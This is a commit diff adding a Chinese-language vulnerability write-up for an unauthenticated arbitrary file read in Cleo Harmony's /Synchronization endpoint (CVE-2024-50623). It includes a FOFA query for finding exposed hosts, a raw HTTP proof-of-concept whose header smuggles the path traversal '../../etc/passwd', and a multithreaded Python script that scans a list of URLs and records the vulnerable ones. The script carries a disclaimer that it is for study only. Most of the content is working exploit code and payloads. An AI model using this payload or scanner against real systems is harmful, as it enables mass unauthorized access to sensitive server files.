Update Cleo Harmony接口Synchronization存在任意文件读取漏洞.md

2025-05-05 10:17:57 +00:00 · 2025-03-17 09:53:34 +08:00 · 2025-03-17 09:53:34 +08:00 · dcc3344261
commit dcc3344261
parent c6ba35b893
1 changed files with 123 additions and 0 deletions
--- a/Harmony接口Synchronization存在任意文件读取漏洞.md
+++ b/Harmony接口Synchronization存在任意文件读取漏洞.md
@ -1 +1,124 @@
+## Cleo Harmony接口Synchronization存在任意文件读取漏洞
+Cleo Harmony的/Synchronization接口存在任意文件读取漏洞，未经身份验证的攻击者可以通过漏洞读取服务器任意文件，从而获取大量敏感信息。
+## fofa
+```
+body="packages/partnerlogos/userportal_logo"
+```
+## POC
+```yaml
+GET /Synchronization HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Cookie: csrftoken=z1GtnjQWsIKwGazlFX7V; csrftoken=NX6iujIUcamW9umprA1vx19dzU6EZNLa; csrftoken=kZ4jVQ4uZtITYtnweSsVDUEwZ2ltraTF
+Priority: u=4
+Retrieve: l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;s=True;b=False;pp=1337;path=../../etc/passwd

+
+```
+## python利用脚本
+```
+# _*_ coding : utf-8 _*_
+# @Time : 2025-03-14 9:20
+# Author : 长安风生
+# File : Cleo_read
+# Project : pythonProject
+import requests
+import sys
+from concurrent.futures import ThreadPoolExecutor, as_completed
+from urllib3.exceptions import InsecureRequestWarning
+
+# 禁止显示与不安全请求相关的警告
+requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+
+#检测前描述
+def print_logo():
+    logo = """
+             .__                                           _____                           .__                           
+  ____ |  |__ _____    ____    _________    ____   _/ ____\____   ____    ____  _____|  |__   ____   ____    ____  
+_/ ___\|  |  \\__  \  /    \  / ___\__  \  /    \  \   __\/ __ \ /    \  / ___\/  ___/  |  \_/ __ \ /    \  / ___\ 
+\  \___|   Y  \/ __ \|   |  \/ /_/  > __ \|   |  \  |  | \  ___/|   |  \/ /_/  >___ \|   Y  \  ___/|   |  \/ /_/  >
+ \___  >___|  (____  /___|  /\___  (____  /___|  /  |__|  \___  >___|  /\___  /____  >___|  /\___  >___|  /\___  / 
+     \/     \/     \/     \//_____/     \/     \/             \/     \//_____/     \/     \/     \/     \//_____/
+    """
+    print(logo)
+
+def print_usage():
+    print("使用帮助：")
+    print("    1.创建Cleo_read_check.txt把要检测的url放入Cleo_read_check.txt")
+    print("    2.把Cleo_read_check.txt和Cleo_read.py放在同一文件夹下")
+    print("    3.python Cleo_read.py")
+    print()
+    print("结果说明：")
+    print("    成功检测出的url会保存到Cleo_read.txt")
+    print()
+
+def start_message():
+    print("本程序仅供学习使用，如若非法他用，与本文作者无关，需自行负责！")
+    print("程序功能：多线测检测Cleo文件传输软件任意文件读取漏洞(CVE-2024-50623）   By:长安风生&棉花糖网络安全")
+    print("-" * 88)  # 打印分割线
+
+def print_red(text):
+    # ANSI转义序列设置为红色，让存在的漏洞的变成红色醒目
+    red_start = "\033[91m"
+    red_end = "\033[0m"
+    print(red_start + text + red_end)
+
+def check_vulnerability(target_url):
+    headers = {
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36',
+        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
+        'Accept-Language': 'zh-CN,zh;q=0.9',
+        'Vlsync': ('Retrieve;l=Ab1234-RQ0258;n=VLTrader;v=7.2.1;a=1337;po=1337;'
+                   's=True;b=False;pp=1337;path=../../etc/passwd'),
+        'Accept-Encoding': 'gzip, deflate, br'
+    }
+
+    try:
+        response = requests.get(target_url, headers=headers, timeout=10, verify=False)
+        if "root:x:" in response.text:
+            # print(response.text)
+            print_red(f"[+] The target {target_url} is potentially vulnerable to arbitrary file read.")
+            return target_url
+        else:
+            print(f"[-] The target {target_url} does not appear to be vulnerable to arbitrary file read.")
+    except requests.RequestException as e:
+        print(f"[!] Failed to connect to {target_url}: {e}")
+    return None
+
+def process_url(line):
+    base_url = line.strip()
+    target_url = base_url + '/Synchronization'
+    return check_vulnerability(target_url)
+
+if __name__ == "__main__":
+    print_logo()
+    print_usage()
+    start_message()
+    # 询问是否想要执行检测
+    execute_check = input("您希望现在执行漏洞检测吗？(yes/no): ").strip().lower()
+    if execute_check not in ["yes", "y"]:
+        print("执行已取消!")
+        sys.exit(0)
+
+    vulnerable_urls = []  # 用于存储检查成功的URL
+
+    with open('Cleo_read_check.txt', 'r') as file:
+        urls = [line.strip() for line in file]
+
+    with ThreadPoolExecutor(max_workers=10) as executor:
+        # 使用future对象来获取线程执行的结果
+        future_to_url = {executor.submit(process_url, url): url for url in urls}
+        for future in as_completed(future_to_url):
+            result = future.result()
+            if result:
+                vulnerable_urls.append(result)
+
+    # 执行结束后，将所有检测成功的URL写入Cleo_read.txt
+    with open('Cleo_read.txt', 'w') as file:
+        for url in vulnerable_urls:
+            file.write(url + '\n')
+```